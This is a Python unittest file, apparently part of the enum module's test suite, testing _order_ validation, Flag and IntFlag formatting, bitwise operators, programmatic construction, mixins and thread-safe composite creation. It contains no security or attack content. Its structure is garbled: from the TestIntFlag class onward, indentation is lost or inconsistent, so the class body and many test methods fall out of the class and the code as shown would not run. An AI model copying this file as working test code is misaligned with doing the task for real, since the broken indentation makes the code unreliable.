code = compile(code, "<string>", "exec")
global_ns = {}
local_ls = {}
exec(code, global_ns, local_ls)
class TestOrder(unittest.TestCase):
    """Tests of the _order_ attribute: definition order must match it
    exactly, with aliases exempt from the check."""

    def test_same_members(self):
        class Color(Enum):
            _order_ = 'red green blue'
            red = 1
            green = 2
            blue = 3

    def test_same_members_with_aliases(self):
        # aliases (verde) are not counted against _order_
        class Color(Enum):
            _order_ = 'red green blue'
            red = 1
            green = 2
            blue = 3
            verde = green

    def test_same_members_wrong_order(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue'
                red = 1
                blue = 3
                green = 2

    def test_order_has_extra_members(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue purple'
                red = 1
                green = 2
                blue = 3

    def test_order_has_extra_members_with_aliases(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue purple'
                red = 1
                green = 2
                blue = 3
                verde = green

    def test_enum_has_extra_members(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue'
                red = 1
                green = 2
                blue = 3
                purple = 4

    def test_enum_has_extra_members_with_aliases(self):
        with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
            class Color(Enum):
                _order_ = 'red green blue'
                red = 1
                green = 2
                blue = 3
                purple = 4
                verde = green
class TestFlag(unittest.TestCase):
    """Tests of the Flags."""

    class Perm(Flag):
        R, W, X = 4, 2, 1

    class Open(Flag):
        RO = 0
        WO = 1
        RW = 2
        AC = 3
        CE = 1<<19

    class Color(Flag):
        BLACK = 0
        RED = 1
        GREEN = 2
        BLUE = 4
        PURPLE = RED|BLUE

    def test_str(self):
        # str of composite flags lists the decomposed member names
        Perm = self.Perm
        self.assertEqual(str(Perm.R), 'Perm.R')
        self.assertEqual(str(Perm.W), 'Perm.W')
        self.assertEqual(str(Perm.X), 'Perm.X')
        self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
        self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
        self.assertEqual(str(Perm(0)), 'Perm.0')
        self.assertEqual(str(~Perm.R), 'Perm.W|X')
        self.assertEqual(str(~Perm.W), 'Perm.R|X')
        self.assertEqual(str(~Perm.X), 'Perm.R|W')
        self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
        self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
        self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
        Open = self.Open
        self.assertEqual(str(Open.RO), 'Open.RO')
        self.assertEqual(str(Open.WO), 'Open.WO')
        self.assertEqual(str(Open.AC), 'Open.AC')
        self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
        self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
        self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
        self.assertEqual(str(~Open.WO), 'Open.CE|RW')
        self.assertEqual(str(~Open.AC), 'Open.CE')
        self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
        self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')

    def test_repr(self):
        Perm = self.Perm
        self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
        self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
        self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
        self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
        self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
        self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
        self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
        self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
        self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
        self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
        self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
        self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
        Open = self.Open
        self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
        self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
        self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
        self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
        self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
        self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
        self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
        self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
        self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
        self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')

    def test_format(self):
        # Flag (unlike IntFlag) formats via str()
        Perm = self.Perm
        self.assertEqual(format(Perm.R, ''), 'Perm.R')
        self.assertEqual(format(Perm.R | Perm.X, ''), 'Perm.R|X')

    def test_or(self):
        Perm = self.Perm
        for i in Perm:
            for j in Perm:
                self.assertEqual((i | j), Perm(i.value | j.value))
                self.assertEqual((i | j).value, i.value | j.value)
                self.assertIs(type(i | j), Perm)
        for i in Perm:
            self.assertIs(i | i, i)
        Open = self.Open
        self.assertIs(Open.RO | Open.CE, Open.CE)

    def test_and(self):
        Perm = self.Perm
        RW = Perm.R | Perm.W
        RX = Perm.R | Perm.X
        WX = Perm.W | Perm.X
        RWX = Perm.R | Perm.W | Perm.X
        values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
        for i in values:
            for j in values:
                self.assertEqual((i & j).value, i.value & j.value)
                self.assertIs(type(i & j), Perm)
        for i in Perm:
            self.assertIs(i & i, i)
            self.assertIs(i & RWX, i)
            self.assertIs(RWX & i, i)
        Open = self.Open
        self.assertIs(Open.RO & Open.CE, Open.RO)

    def test_xor(self):
        Perm = self.Perm
        for i in Perm:
            for j in Perm:
                self.assertEqual((i ^ j).value, i.value ^ j.value)
                self.assertIs(type(i ^ j), Perm)
        for i in Perm:
            self.assertIs(i ^ Perm(0), i)
            self.assertIs(Perm(0) ^ i, i)
        Open = self.Open
        self.assertIs(Open.RO ^ Open.CE, Open.CE)
        self.assertIs(Open.CE ^ Open.CE, Open.RO)

    def test_invert(self):
        Perm = self.Perm
        RW = Perm.R | Perm.W
        RX = Perm.R | Perm.X
        WX = Perm.W | Perm.X
        RWX = Perm.R | Perm.W | Perm.X
        values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
        for i in values:
            self.assertIs(type(~i), Perm)
            self.assertEqual(~~i, i)
        for i in Perm:
            self.assertIs(~~i, i)
        Open = self.Open
        self.assertIs(Open.WO & ~Open.WO, Open.RO)
        self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)

    def test_bool(self):
        # a Flag is truthy iff its value is nonzero
        Perm = self.Perm
        for f in Perm:
            self.assertTrue(f)
        Open = self.Open
        for f in Open:
            self.assertEqual(bool(f.value), bool(f))

    def test_programatic_function_string(self):
        Perm = Flag('Perm', 'R W X')
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<i
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_string_with_start(self):
        # start= sets the first flag bit; later members shift from it
        Perm = Flag('Perm', 'R W X', start=8)
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 8<<i
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_string_list(self):
        Perm = Flag('Perm', ['R', 'W', 'X'])
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<i
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_iterable(self):
        Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<(2*i+1)
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_programatic_function_from_dict(self):
        Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
        lst = list(Perm)
        self.assertEqual(len(lst), len(Perm))
        self.assertEqual(len(Perm), 3, Perm)
        self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
        for i, n in enumerate('R W X'.split()):
            v = 1<<(2*i+1)
            e = Perm(v)
            self.assertEqual(e.value, v)
            self.assertEqual(type(e.value), int)
            self.assertEqual(e.name, n)
            self.assertIn(e, Perm)
            self.assertIs(type(e), Perm)

    def test_pickle(self):
        # FlagStooges is defined at module level elsewhere in this file;
        # it is an Exception instance if its creation failed at import time
        if isinstance(FlagStooges, Exception):
            raise FlagStooges
        test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
        test_pickle_dump_load(self.assertIs, FlagStooges)

    def test_contains(self):
        # membership is only defined between flags of the same class
        Open = self.Open
        Color = self.Color
        self.assertFalse(Color.BLACK in Open)
        self.assertFalse(Open.RO in Color)
        with self.assertRaises(TypeError):
            'BLACK' in Color
        with self.assertRaises(TypeError):
            'RO' in Open
        with self.assertRaises(TypeError):
            1 in Color
        with self.assertRaises(TypeError):
            1 in Open

    def test_member_contains(self):
        # 'in' between members tests bitwise containment
        Perm = self.Perm
        R, W, X = Perm
        RW = R | W
        RX = R | X
        WX = W | X
        RWX = R | W | X
        self.assertTrue(R in RW)
        self.assertTrue(R in RX)
        self.assertTrue(R in RWX)
        self.assertTrue(W in RW)
        self.assertTrue(W in WX)
        self.assertTrue(W in RWX)
        self.assertTrue(X in RX)
        self.assertTrue(X in WX)
        self.assertTrue(X in RWX)
        self.assertFalse(R in WX)
        self.assertFalse(W in RX)
        self.assertFalse(X in RW)

    def test_auto_number(self):
        # in a Flag, auto() produces powers of two
        class Color(Flag):
            red = auto()
            blue = auto()
            green = auto()
        self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
        self.assertEqual(Color.red.value, 1)
        self.assertEqual(Color.blue.value, 2)
        self.assertEqual(Color.green.value, 4)

    def test_auto_number_garbage(self):
        with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
            class Color(Flag):
                red = 'not an int'
                blue = auto()

    def test_cascading_failure(self):
        class Bizarre(Flag):
            c = 3
            d = 4
            f = 6
        # Bizarre.c | Bizarre.d
        # repeated lookups must fail consistently (no state corruption)
        self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
        self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
        self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
        self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
        self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
        self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)

    def test_duplicate_auto(self):
        class Dupes(Enum):
            first = primero = auto()
            second = auto()
            third = auto()
        self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))

    def test_bizarre(self):
        # composite repr decomposes into defined members, largest first
        class Bizarre(Flag):
            b = 3
            c = 4
            d = 6
        self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')

    def test_multiple_mixin(self):
        class AllMixin:
            @classproperty
            def ALL(cls):
                members = list(cls)
                all_value = None
                if members:
                    all_value = members[0]
                    for member in members[1:]:
                        all_value |= member
                cls.ALL = all_value
                return all_value
        class StrMixin:
            def __str__(self):
                return self._name_.lower()
        class Color(AllMixin, Flag):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(Color.RED.value, 1)
        self.assertEqual(Color.GREEN.value, 2)
        self.assertEqual(Color.BLUE.value, 4)
        self.assertEqual(Color.ALL.value, 7)
        self.assertEqual(str(Color.BLUE), 'Color.BLUE')
        class Color(AllMixin, StrMixin, Flag):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(Color.RED.value, 1)
        self.assertEqual(Color.GREEN.value, 2)
        self.assertEqual(Color.BLUE.value, 4)
        self.assertEqual(Color.ALL.value, 7)
        self.assertEqual(str(Color.BLUE), 'blue')
        class Color(StrMixin, AllMixin, Flag):
            RED = auto()
            GREEN = auto()
            BLUE = auto()
        self.assertEqual(Color.RED.value, 1)
        self.assertEqual(Color.GREEN.value, 2)
        self.assertEqual(Color.BLUE.value, 4)
        self.assertEqual(Color.ALL.value, 7)
        self.assertEqual(str(Color.BLUE), 'blue')

    @support.reap_threads
    def test_unique_composite(self):
        # override __eq__ to be identity only
        class TestFlag(Flag):
            one = auto()
            two = auto()
            three = auto()
            four = auto()
            five = auto()
            six = auto()
            seven = auto()
            eight = auto()
            def __eq__(self, other):
                return self is other
            def __hash__(self):
                return hash(self._value_)
        # have multiple threads competing to complete the composite members
        seen = set()
        failed = False
        def cycle_enum():
            nonlocal failed
            try:
                for i in range(256):
                    seen.add(TestFlag(i))
            except Exception:
                failed = True
        threads = [
            threading.Thread(target=cycle_enum)
            for _ in range(8)
        ]
        with support.start_threads(threads):
            pass
        # check that only 248 members were created
        self.assertFalse(
            failed,
            'at least one thread failed while creating composite members')
        self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(Perm(8)), 'Perm.8')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.-8')
self.assertEqual(str(~(Perm.R | 8)), 'Perm.W|X')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
self.assertEqual(str(Perm(~8)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(Open(4)), 'Open.4')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC|RW|WO')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(str(Open(~4)), 'Open.CE|AC|RW|WO')
def test_repr(self):
    """repr() of IntFlag members: '<Cls.NAMES: value>' including negatives.

    NOTE(review): pre-3.11 formatting, as in test_str above.
    """
    Perm = self.Perm
    self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
    self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
    self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
    self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
    self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
    self.assertEqual(repr(Perm.R | 8), '<Perm.8|R: 12>')
    self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
    self.assertEqual(repr(Perm(8)), '<Perm.8: 8>')
    # Inverted members keep the negative underlying int value.
    self.assertEqual(repr(~Perm.R), '<Perm.W|X: -5>')
    self.assertEqual(repr(~Perm.W), '<Perm.R|X: -3>')
    self.assertEqual(repr(~Perm.X), '<Perm.R|W: -2>')
    self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: -7>')
    self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.-8: -8>')
    self.assertEqual(repr(~(Perm.R | 8)), '<Perm.W|X: -13>')
    self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: -1>')
    self.assertEqual(repr(Perm(~8)), '<Perm.R|W|X: -9>')
    Open = self.Open
    self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
    self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
    self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
    self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
    self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
    self.assertEqual(repr(Open(4)), '<Open.4: 4>')
    self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: -1>')
    self.assertEqual(repr(~Open.WO), '<Open.CE|RW: -2>')
    self.assertEqual(repr(~Open.AC), '<Open.CE: -4>')
    self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC|RW|WO: -524289>')
    self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: -524290>')
    self.assertEqual(repr(Open(~4)), '<Open.CE|AC|RW|WO: -5>')
def test_format(self):
    """format() with an empty spec falls through to plain int formatting."""
    flag_cls = self.Perm
    single = format(flag_cls.R, '')
    combined = format(flag_cls.R | flag_cls.X, '')
    self.assertEqual(single, '4')
    self.assertEqual(combined, '5')
def test_or(self):
    """OR of members with members and ints stays within the flag class."""
    Perm = self.Perm
    for i in Perm:
        for j in Perm:
            self.assertEqual(i | j, i.value | j.value)
            self.assertEqual((i | j).value, i.value | j.value)
            self.assertIs(type(i | j), Perm)
        for j in range(8):
            self.assertEqual(i | j, i.value | j)
            self.assertEqual((i | j).value, i.value | j)
            self.assertIs(type(i | j), Perm)
            # Reflected operand order must behave the same.
            self.assertEqual(j | i, j | i.value)
            self.assertEqual((j | i).value, j | i.value)
            self.assertIs(type(j | i), Perm)
    for i in Perm:
        # Identity: OR with self or 0 returns the very same member object.
        self.assertIs(i | i, i)
        self.assertIs(i | 0, i)
        self.assertIs(0 | i, i)
    Open = self.Open
    self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
    """AND against members, composites, and plain ints."""
    Perm = self.Perm
    RW = Perm.R | Perm.W
    RX = Perm.R | Perm.X
    WX = Perm.W | Perm.X
    RWX = Perm.R | Perm.W | Perm.X
    values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
    for i in values:
        for j in values:
            self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
            self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
            self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
        for j in range(8):
            self.assertEqual(i & j, i.value & j)
            self.assertEqual((i & j).value, i.value & j)
            self.assertIs(type(i & j), Perm)
            # Reflected operand order must behave the same.
            self.assertEqual(j & i, j & i.value)
            self.assertEqual((j & i).value, j & i.value)
            self.assertIs(type(j & i), Perm)
    for i in Perm:
        # Identity: masking with self or the full mask (7) is a no-op.
        self.assertIs(i & i, i)
        self.assertIs(i & 7, i)
        self.assertIs(7 & i, i)
    Open = self.Open
    self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
    """XOR of members with members and ints stays within the flag class."""
    Perm = self.Perm
    for i in Perm:
        for j in Perm:
            self.assertEqual(i ^ j, i.value ^ j.value)
            self.assertEqual((i ^ j).value, i.value ^ j.value)
            self.assertIs(type(i ^ j), Perm)
        for j in range(8):
            self.assertEqual(i ^ j, i.value ^ j)
            self.assertEqual((i ^ j).value, i.value ^ j)
            self.assertIs(type(i ^ j), Perm)
            # Reflected operand order must behave the same.
            self.assertEqual(j ^ i, j ^ i.value)
            self.assertEqual((j ^ i).value, j ^ i.value)
            self.assertIs(type(j ^ i), Perm)
    for i in Perm:
        # Identity: XOR with 0 returns the very same member object.
        self.assertIs(i ^ 0, i)
        self.assertIs(0 ^ i, i)
    Open = self.Open
    self.assertIs(Open.RO ^ Open.CE, Open.CE)
    self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
    """~ matches int inversion in value but yields a same-class member.

    NOTE(review): pre-3.11 semantics where ~member keeps the negative
    underlying value -- confirm target version.
    """
    Perm = self.Perm
    RW = Perm.R | Perm.W
    RX = Perm.R | Perm.X
    WX = Perm.W | Perm.X
    RWX = Perm.R | Perm.W | Perm.X
    values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
    for i in values:
        self.assertEqual(~i, ~i.value)
        self.assertEqual((~i).value, ~i.value)
        self.assertIs(type(~i), Perm)
        # Double inversion round-trips to an equal member.
        self.assertEqual(~~i, i)
    for i in Perm:
        self.assertIs(~~i, i)
    Open = self.Open
    self.assertIs(Open.WO & ~Open.WO, Open.RO)
    self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_contains(self):
    """`in` only accepts members of the same flag class.

    NOTE(review): `in` with a non-member operand raises TypeError here;
    later Python versions relaxed this -- confirm the targeted version.
    """
    Open = self.Open
    Color = self.Color
    self.assertTrue(Color.GREEN in Color)
    self.assertTrue(Open.RW in Open)
    # Members of a different flag class are simply not contained.
    self.assertFalse(Color.GREEN in Open)
    self.assertFalse(Open.RW in Color)
    with self.assertRaises(TypeError):
        'GREEN' in Color
    with self.assertRaises(TypeError):
        'RW' in Open
    with self.assertRaises(TypeError):
        2 in Color
    with self.assertRaises(TypeError):
        2 in Open
def test_member_contains(self):
    """`member in composite` tests whether all of the member's bits are set."""
    Perm = self.Perm
    R, W, X = Perm
    RW = R | W
    RX = R | X
    WX = W | X
    RWX = R | W | X
    self.assertTrue(R in RW)
    self.assertTrue(R in RX)
    self.assertTrue(R in RWX)
    self.assertTrue(W in RW)
    self.assertTrue(W in WX)
    self.assertTrue(W in RWX)
    self.assertTrue(X in RX)
    self.assertTrue(X in WX)
    self.assertTrue(X in RWX)
    self.assertFalse(R in WX)
    self.assertFalse(W in RX)
    self.assertFalse(X in RW)
    # Non-member operands are rejected outright.
    with self.assertRaises(TypeError):
        self.assertFalse('test' in RW)
def test_bool(self):
    """Truthiness of a flag member follows its underlying int value."""
    Perm = self.Perm
    for f in Perm:
        # Every Perm member has a non-zero value, hence truthy.
        self.assertTrue(f)
    Open = self.Open
    for f in Open:
        # Open.RO is 0 and therefore falsy; the rest are truthy.
        self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
    """Mixins compose with IntFlag; the MRO decides which __str__ is used."""
    class AllMixin:
        @classproperty  # helper descriptor defined elsewhere in this module
        def ALL(cls):
            # Union of all members, computed lazily; the descriptor is then
            # shadowed by a plain class attribute so it is computed once.
            members = list(cls)
            all_value = None
            if members:
                all_value = members[0]
                for member in members[1:]:
                    all_value |= member
            cls.ALL = all_value
            return all_value
    class StrMixin:
        def __str__(self):
            return self._name_.lower()
    class Color(AllMixin, IntFlag):
        RED = auto()
        GREEN = auto()
        BLUE = auto()
    self.assertEqual(Color.RED.value, 1)
    self.assertEqual(Color.GREEN.value, 2)
    self.assertEqual(Color.BLUE.value, 4)
    self.assertEqual(Color.ALL.value, 7)
    # No StrMixin: the default flag __str__ is used.
    self.assertEqual(str(Color.BLUE), 'Color.BLUE')
    class Color(AllMixin, StrMixin, IntFlag):
        RED = auto()
        GREEN = auto()
        BLUE = auto()
    self.assertEqual(Color.RED.value, 1)
    self.assertEqual(Color.GREEN.value, 2)
    self.assertEqual(Color.BLUE.value, 4)
    self.assertEqual(Color.ALL.value, 7)
    # StrMixin's __str__ wins in either mixin order.
    self.assertEqual(str(Color.BLUE), 'blue')
    class Color(StrMixin, AllMixin, IntFlag):
        RED = auto()
        GREEN = auto()
        BLUE = auto()
    self.assertEqual(Color.RED.value, 1)
    self.assertEqual(Color.GREEN.value, 2)
    self.assertEqual(Color.BLUE.value, 4)
    self.assertEqual(Color.ALL.value, 7)
    self.assertEqual(str(Color.BLUE), 'blue')
@support.reap_threads
def test_unique_composite(self):
    """Composite flag members must be created exactly once under races."""
    # override __eq__ to be identity only
    class TestFlag(IntFlag):
        one = auto()
        two = auto()
        three = auto()
        four = auto()
        five = auto()
        six = auto()
        seven = auto()
        eight = auto()
        def __eq__(self, other):
            return self is other
        def __hash__(self):
            return hash(self._value_)
    # have multiple threads competing to complete the composite members
    seen = set()
    failed = False
    def cycle_enum():
        nonlocal failed
        try:
            for i in range(256):
                seen.add(TestFlag(i))
        except Exception:
            failed = True
    threads = [
        threading.Thread(target=cycle_enum)
        for _ in range(8)
    ]
    with support.start_threads(threads):
        pass
